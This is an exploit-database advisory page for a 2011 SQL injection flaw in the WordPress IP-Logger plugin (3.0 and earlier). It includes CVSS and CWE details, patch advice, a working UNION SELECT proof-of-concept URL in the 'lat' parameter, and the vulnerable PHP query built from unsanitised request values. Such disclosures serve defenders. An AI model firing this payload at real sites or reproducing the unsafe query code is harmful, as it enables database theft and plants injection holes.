header-logo
Suggest Exploit
vendor:
IP-Logger
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: IP-Logger
Affected Version From: <= 3.0
Affected Version To: 3
Patch Exists: YES
Related CWE:
CPE: a:wordpress:ip-logger:3.0
Metasploit:
Other Scripts:
Platforms Tested: WordPress
2011

WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability

The WordPress IP-Logger plugin version 3.0 is vulnerable to SQL Injection. By injecting a specially crafted SQL query in the 'lat' parameter, an attacker can manipulate the SQL query and retrieve sensitive information from the database.

Mitigation:

Update to the latest version of the plugin to patch the vulnerability. Additionally, input validation and parameterized queries should be used to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1

---------------
Vulnerable code
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,Blocked,Ignored from $table_name 
  where Latitude=%s and Longitude=%s and Blocked = '%s'
  order by stamp asc limit 50",
  $_REQUEST["lat"],
  $_REQUEST["lon"],
  $_REQUEST["blocked"]);

$res = mysql_query($sql);